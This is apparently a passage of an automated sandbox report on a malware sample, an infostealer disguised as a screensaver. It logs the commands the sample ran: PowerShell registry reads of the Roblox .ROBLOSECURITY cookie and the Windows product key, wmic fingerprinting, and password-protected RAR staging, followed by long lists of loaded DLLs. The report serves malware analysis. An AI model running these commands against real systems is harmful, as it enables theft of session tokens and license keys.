AAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
